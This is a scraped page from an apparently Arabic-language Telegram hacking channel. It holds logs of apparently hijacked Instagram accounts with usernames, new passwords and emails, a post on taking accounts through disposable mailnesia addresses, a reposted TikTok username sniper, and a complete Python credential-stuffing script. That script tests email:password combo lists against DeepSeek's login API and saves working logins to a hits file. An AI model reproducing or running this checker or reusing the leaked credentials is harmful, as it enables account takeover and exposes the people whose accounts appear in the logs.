Арабский питон
Open in Telegram
Привет @durov Канал не нарушает правила Telegram. Нет спама, оскорблений, порнографии или нзаконной торговли. Пожалуйста, пересмотрите жалобы. Спасибо!
Show more1 972
Subscribers
-1024 hours
-2237 days
-1 19930 days
Posts Archive
1 937
Repost from 𝑯𝑨𝑵𝑰[22]
اد1ة مىًاحات انىىتا دومن mailnesia.com .
تصىد وتىىحب المىّاح تدزلك يوزر وباس واىٍميل
dev : @FFNZZ - @qdf_46
1 937
Instagram Account Reset Complete
Username: ifga24
New Password: HRFLABUSFO
Email: ifga@mailnesia.com
Time: 2026-03-19 01:28:10
By : @FFNZZ - :@qdf_46
Instagram Account Reset Complete
Username: eeeerrrr0.ficiiall
New Password: XARkiX6z1J
Email: roko@mailnesia.com
Time: 2026-03-19 01:29:14
By : @FFNZZ - :@qdf_46
1 937
Repost from TikTok Code
تشيكر يوزرات تيك توك كامل
خلي ايدي،توكن يصيد رباعيات
سطر 749 تغير طول اليوزر اني مخلي 4 تكدر تسوي 5 حسب رغبتك
by ( @is71s )
1 937
import requests
import json
import time
import os
def deepseek(email, password):
session = requests.Session()
url = "https://chat.deepseek.com/api/v0/users/login"
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Mobile Safari/537.36',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.9,ckb-IQ;q=0.8,ckb;q=0.7',
'Content-Type': 'application/json',
'Origin': 'https://chat.deepseek.com',
'Referer': 'https://chat.deepseek.com/sign_in',
'x-app-version': '20241129.1',
'x-client-locale': 'en_US',
'x-client-platform': 'web',
'x-client-timezone-offset': '10800',
'x-client-version': '1.7.1',
'sec-ch-ua': '"Chromium";v="137", "Not/A)Brand";v="24"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-platform': '"Android"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin'
}
payload = {
'email': email,
'mobile': '',
'password': password,
'area_code': '',
'device_id': '',
'os': 'web'
}
try:
response = session.post(url, json=payload, headers=headers, timeout=10)
result = response.json()
if '"code":0' in response.text and 'PASSWORD_OR_USER_NAME_IS_WRONG' not in response.text:
if result.get('code') == 0 and 'PASSWORD_OR_USER_NAME_IS_WRONG' not in str(result):
print(f" HIT: {email}:{password}")
with open('hits.txt', 'a', encoding='utf-8') as f:
f.write(f"{email}:{password}\n")
return True
else:
print(f" BAD: {email}:{password}")
return False
else:
print(f" BAD: {email}:{password}")
return False
except Exception as e:
return False
def main():
combo_file = input("Enter combo: ").strip()
if not os.path.exists(combo_file):
print("no combo")
return
with open(combo_file, 'r', encoding='utf-8', errors='ignore') as f:
combos = [line.strip() for line in f if ':' in line]
hits = 0
bads = 0
for i, combo in enumerate(combos, 1):
if ':' not in combo:
continue
email, password = combo.split(':', 1)
success = deepseek(email.strip(), password.strip())
if success:
hits += 1
else:
bads += 1
time.sleep(0.5)
if __name__ == "__main__":
main()
Deepseek login check
Available now! Telegram Research 2025 — the year's key insights 
